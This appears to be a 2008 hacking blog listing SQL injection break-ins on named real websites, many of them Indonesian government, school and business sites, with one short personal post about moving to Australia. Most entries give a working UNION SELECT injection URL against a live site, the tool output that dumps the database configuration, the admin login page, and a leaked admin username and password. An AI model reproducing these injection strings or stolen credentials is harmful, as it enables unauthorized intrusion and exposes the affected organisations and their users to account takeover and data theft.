Tool: schemafuzz.py v5.0[+] URL:http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,sqli,2,3,4--[+] Evasion Used: "+" "--"[+] 17:19:39[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: seaedunet_db User: seaedunet@localhost Version: 5.0.32-Debian_7etch6-log[+] Do we have Access to MySQL Database: Yes <-- w00t w00t[!] http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4+FROM+mysql.user--[+]...
viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.
Wednesday, October 29, 2008
Monday, October 27, 2008
Here in Australia...
Wow man, every day is a busy day. Moving to another country is not an easy task for me. With the "unhuman" weather, I've already gotten sick these days, with a sore throat and runny nose. So, here in Australia, I can easily do hacking stuff like in Indonesia. I try to "play safe" and not ruin my permit to study here. Here, I can't download as much as I did in Indonesia (poor me). I think Indonesia is better...
Wednesday, October 15, 2008
[SQLi] http://sman1-boyolali.com

Tool --> schemafuzz.py v5.0Admin login page --> http://sman1-boyolali.com/admin/Admin usr:pwd --> admin:mastar1234Dump:[+] URL:http://sman1-boyolali.com/detailberita.php?id=6+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7,8--[+] Evasion Used: "+" "--"[+] 12:40:16[+] Proxy Not Given[+] Gathering MySQL...
[SQLi] http://www.buturnews.idrap.or.id

Tool --> blindext.py v5.0User login --> buturnews:banda1302 (see else in dump)Dump:[+] URL:http://www.buturnews.idrap.or.id/detailBerita.php?ID=62[+] Proxy Not Given[+] Gathering MySQL Server Configuration... [+] MySQL >= v5.0.0 found![+] Showing Tables from database "t79166_dbbutur"[+] 10:12:30[+]...
[SQLi] http://www.jiwasraya.co.id

Admin login page --> http://www.jiwasraya.co.id/admin/Admin usr:pwd --> admin:ari1007 (see else in dump)Dump:[+] URL:http://www.jiwasraya.co.id/detailberita.php?id=233+AND+1=2+UNION+SELECT+sqli--[+] Evasion Used: "+" "--"[+] 09:51:11[+] Proxy Not Given[+] Gathering MySQL Server Configuration......
[SQLi] http://mobile.kompas.com
I tried to get the full schema of kompas.com, but I'm too tired and there are too many. If you're so eager to "hack", try to get them all :) Info:[+] URL:http://mobile.kompas.com/?go=p&pid=1&idm=8'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,sqli,2,3/*[+] Evasion Used: "/**/" "/*"[+] 17:59:19[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: kompasmobile User: megadb@10.50.12.196 Version:...
Tuesday, October 14, 2008
[SQLi] http://www.gontha.com/

Tool --> schemafuzz.py v5.0Admin login page --> http://www.gontha.com/admin/Admin usr:pwd --> sai:saimanDump:[+] URL:http://www.gontha.com/photo.php?action=detail&mode=viewphoto&cid=24&idalbum=13+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--[+] Evasion Used: "+" "--"[+] 18:57:14[+]...
[SQLi] http://golkar.go.id
Tool --> schemafuzz v5.0Dump:[+] URL:http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+sqli,1,2,3--[+] Evasion Used: "+" "--"[+] 13:14:02[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: golkar_pusat User: golkar_pusat@202.43.163.198 Version: 5.0.51a-3ubuntu5.1[+] Do we have Access to MySQL Database: Yes <-- w00t w00t[!] http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+0,1,concat(user,0x3a,password),3+FROM+mysql.user--[+]...
[SQLi] http://en.agrimedia.com/

Tool --> schemafuzz.py v5.0Admin login page --> http://en.agrimedia.com/admin/Admin usr:login --> admin:agri8z3 (see else in dump)Dump:[+] URL:http://en.agrimedia.com/libfeed/shop/detail.php?id=246'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7,8,9,10,11,12,13/*[+] Evasion Used: "/**/"...
[SQLi] http://www.theperfusionstore.com/

Admin login page --> http://www.theperfusionstore.com/admin/Admin usr:pwd --> admin:p3rfusionDump:[+] URL:http://www.theperfusionstore.com/shop/detail.php?cat=4&ID=13+AND+1=2+UNION+SELECT+sqli,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--[+] Evasion Used: "+" "--"[+] 20:30:50[+]...
[SQLi] http://www.racewithfaith.com

Tool: schemafuzz.py v5.0Admin login page --> http://www.racewithfaith.com/admin/Admin usr:pwd --> dana:vr00mDump[+] URL:http://www.racewithfaith.com/newsdetail.php?ID=35+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8--[+] Evasion Used: "+" "--"[+] 20:12:07[+] Proxy Not Given[+] Gathering MySQL...
Monday, October 13, 2008
[SQLi] http://www.fiacona.org

Tool --> ManualAdmin login page --> http://www.fiacona.org/adminAdmin usr:pwd --> admin:tigersDatabase info: http://www.fiacona.org/category_index.php?catid=-95'+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--%20and%20'1'='2Dump: htt...
[SQLi] http://www.arabeuropean.org

Tool --> blindext.py v3.0 (blind SQL injection)Database info:[+] URL:http://www.arabeuropean.org/newsdetail.php?ID=94[+] Proxy Not Given[+] Gathering MySQL Server Configuration... [+] MySQL >= v4.0.0 found![+] Showing database version, username@location, and database name![+] 15:05:23[0]: 4.1.22-standard:harabe30_arabsen@localhost:harabe30_arabsengAdmin...
[SQLi] http://www.bainfokomsumut.go.id/

Tool --> schemafuzz.py v5.0Admin login page --> http://www.bainfokomsumut.go.id/Admin usr:pwd --> riza:milanistaDump:[+] URL:http://www.bainfokomsumut.go.id/detail.php?id=1634+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5--[+] Evasion Used: "+" "--"[+] 13:27:39[+] Proxy Not Given[+] Gathering MySQL Server...
[SQLi] http://ukbi.pusatbahasa.diknas.go.id

Tool --> schemafuzz.py v5.0 and instinct ^^Admin loc --> http://ukbi.pusatbahasa.diknas.go.id/admin_ukbi.phpAdmin usr:pwd --> ukbi:ukbi2007 (see more in above pic)Dump:[+] URL:http://ukbi.pusatbahasa.diknas.go.id/detail.php?id=29+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7--[+] Evasion Used:...
[SQLi] http://papua.litbang.deptan.go.id

Tool --> schemafuzz.py v5.0Admin loc --> http://papua.litbang.deptan.go.id/login.htmlAdmin usr:pwd --> admin:n0rm1 (see the others in dump or above pic)Dump:[+] URL:http://papua.litbang.deptan.go.id/detail.php?id=10+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7--[+] Evasion Used: "+" "--"[+] 12:58:37[+]...
[SQLi] http://www.azpsych.us/

PoC: http://www.azpsych.us/detailnews.php?id=44+AND+1=2+UNION+SELECT+0,user,password,3,4,5+from+admin--Info:Database: azpsyus_mainUser: azpsyus@localhostVersion: 5.0.51a-communityAdmin loc --> http://www.azpsych.us/admin/Admin usr:pwd --> admin:aztps...
[SQLi] http://inixindojogja.com/

Tool --> schemafuzz.py v5.0Admin loc --> http://inixindojogja.com/admin/Admin usr:pwd --> webadmin:webj0gja2006Dump:[+] URL:http://www.inixindojogja.com/detailnews.php?id=59+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7--[+] Evasion Used: "+" "--"[+] 21:40:40[+] Proxy Not Given[+] Gathering MySQL...
[SQLi] http://www.wiyoko.com

Tool --> schemafuzz.py v5.0Admin loc --> http://wiyoko.com/admin/index.phpAdmin usr:pwd --> admin:1111 (see others in the dump or above pic)Dump:[+] URL:http://wiyoko.com/detailnews.php?table=news&id=32+AND+1=2+UNION+SELECT+0,sqli,2,3,4--[+] Evasion Used: "+" "--"[+] 19:54:01[+] Proxy Not...
Sunday, October 12, 2008
http://smpn7-bpp.sch.id/

Tool --> brain and instinctAdmin loc --> http://smpn7-bpp.sch.id/admin/Admin usr:pwd --> admin:admin (carelessness is killing y...
[SQLi] http://www.icmcipanas.sch.id

Tool: schemafuzz.py v5.0Admin loc --> http://www.icmcipanas.sch.id/cpanel/admin.phpAdmin usr:pwd --> see above pic.Dump:[+] URL:http://www.icmcipanas.sch.id/news.php?p=detn&kode=46+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5--[+] Evasion Used: "+" "--"[+] 21:22:53[+] Proxy Not Given[+] Gathering MySQL...
Saturday, October 11, 2008
[SQLi] http://qbheadlines.com

Tool --> schemafuzz.py v5.0Admin loc --> http://qbheadlines.com/admin/Admin usr:pwd --> admin:qb09db08 (see dump for more)Dump:[+] URL:http://qbheadlines.com/index.php?cat=5+AND+1=2+UNION+SELECT+sqli,1,2,3,4,5,6,7,8,9--[+] Evasion Used: "+" "--"[+] 21:10:28[+] Proxy Not Given[+] Gathering MySQL...